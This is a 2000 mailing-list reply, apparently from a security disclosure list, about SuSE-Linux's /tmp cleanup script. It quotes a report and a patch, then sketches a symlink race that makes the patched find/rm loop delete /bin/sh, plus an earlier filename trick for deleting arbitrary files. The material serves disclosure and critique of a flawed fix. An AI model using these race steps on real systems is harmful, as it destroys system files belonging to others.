Re: local user can delete arbitrary files on SuSE-Linux

[peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)]

On Fri, 21 Apr 2000, [ISO-8859-1] Peter Münster wrote:

> If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local
> user can delete arbitrary files by doing some commands like these:
> mkdir -p "/tmp/hhh /somedirectory"
> touch -t some-early-date "/tmp/hhh /somedirectory/somefile"
> sleep 1d
...
> Here a possible patch for suse-package aaa_base-2000.1.3-0:
...
> +             find $TMP_DIR/. $OMIT ! -type d \
> +                     -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';'
> +             find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \
> +                     -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'

mkdir -p /tmp/somedirectory/{_junk,bin}
fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk
find /tmp/somedirectory -type f | xargs touch -t some-early-date
touch -t some-early-date /tmp/somedirectory/bin/sh
wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk
mv /tmp/somedirectory /tmp/somedirectory2
ln -s / /tmp/somedirectory

watch /bin/sh disappear...this will teach you not to use find and
rm to clean /tmp :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."